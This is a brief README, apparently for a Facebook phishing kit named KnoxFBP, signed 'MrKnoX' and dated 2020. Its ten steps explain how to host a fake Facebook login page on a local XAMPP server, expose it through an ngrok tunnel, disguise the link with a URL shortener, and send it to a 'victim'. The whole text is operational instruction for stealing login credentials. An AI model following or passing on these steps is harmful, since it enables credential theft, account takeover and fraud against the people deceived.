<!Author - MrKnoX>
<!Date - 10-05-2020>


How To Use

1 - Install Xampp server.
2 - Go to dir: `C:\xampp\htdocs` and delete all files and folders
3 - Extract KnoxFBP.ZIP file to `C:\xampp\htdocs`.
4 - Run Xampp server and start Apache, MySQL.
5 - open browser and type url `http://127.0.0.1/facebook-login/`.
    (If website is runing, close the browser & come back to htdocs folder).
6 - Open CMD here & type command: `ngrok.exe http 80`.
7 - Copy https link & paste in notepad & add `/facebook-login` at the end of url. 
    [HELP:- Screen shot - `HELP SS.png`].
8 - Open URLshorner & paste https URL [copied in step - 5].
9 - Copy new URL(short url).
10- Share new url to your victim.
